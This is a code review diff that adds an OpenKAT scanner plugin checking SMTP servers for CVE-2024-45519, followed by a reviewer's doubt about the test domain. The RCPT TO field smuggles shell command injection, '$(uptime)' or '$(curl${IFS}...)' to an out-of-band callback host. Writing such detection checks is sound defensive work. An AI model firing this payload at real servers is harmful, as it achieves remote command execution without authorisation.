boefjes/boefjes/plugins/kat_cve_2024_45519/main.py

```diff
@@ -0,0 +1,48 @@
+# Based on https://github.com/p33d/CVE-2024-45519
+import socket
+from os import getenv
+
+from boefjes.job_models import BoefjeMeta
+
+
+def smtp_payload_check_vulnerability(host, port, oast=False):
+    with socket.create_connection((host, port), timeout=10) as conn:
+        conn.send(b"EHLO localhost\r\n")
+        conn.recv(1024)
+
+        conn.send(b"MAIL FROM: <aaaa@test.openkat.nl>\r\n")
+        conn.recv(1024)
+
+        # do we have a callback server (out of band security testing) or do we just execute `uptime`
+        if oast:
+            rcpt_to_payload = f'RCPT TO: <"aabbb$(curl${{IFS}}{oast})"@test.openkat.nl>\r\n'.encode()
+        else:
+            rcpt_to_payload = b'RCPT TO: <"aabbb$(uptime)"@test.openkat.nl>\r\n'
```

Comment:
My guess is that this will also fail on vulnerable servers because the server won't accept mail for the test.openkat.nl domain.